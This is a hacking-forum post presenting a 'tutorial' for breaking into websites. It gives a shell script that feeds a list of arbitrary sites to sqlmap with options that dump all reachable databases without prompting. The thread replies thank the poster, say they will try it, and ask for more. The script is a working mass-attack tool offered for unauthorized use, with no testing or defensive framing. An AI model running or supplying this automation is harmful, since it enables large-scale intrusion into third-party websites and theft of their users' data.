Sign in to follow this  
SWAT

Tutorial Automate Hacking into Websites with SQLMap and Shell Script

Recommended Posts

Webp-net-gifmaker.gif

[hide]

LIKE OR GET AUTOBANNED

 

 

TUTORIAL:

[align=center]1. Just get a list of websites and save them to a file.

2. save this shell script to a file[/align]

[align=center]#!/bin/sh

#sunjester / https://underwurld.club

 

#automating sqlmap 

 

if [ -z $1 ];

 

then

 

        echo "specify a file"

 

        exit

 

fi

 

 

 

while IFS='' read -r line || [[ -n "$line" ]]; do

 

        sqlmap -u $line --dump-all --answers="follow=Y" --batch

done < "$1"[/align]

 

3. execute the shell script in your console with the name of the file with the list of websites you saved

 

[align=center](This script will suppress all the questions and may take longer than a normal sqlmap scan.)

 

[/align]

 

 

LIKE OR GET AUTOBANNED

[/hide]

  • Like 1

Share this post


Link to post
Share on other sites

great works and great efforts. thanks for sharing

Share this post


Link to post
Share on other sites

thanks can u make one to get database please

Share this post


Link to post
Share on other sites

gonna try it tyy

Share this post


Link to post
Share on other sites

Thank you for sharing

Share this post


Link to post
Share on other sites

thank you bro

Share this post


Link to post
Share on other sites

gonna try this

Share this post


Link to post
Share on other sites

nice man, pcquiao winner xD

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this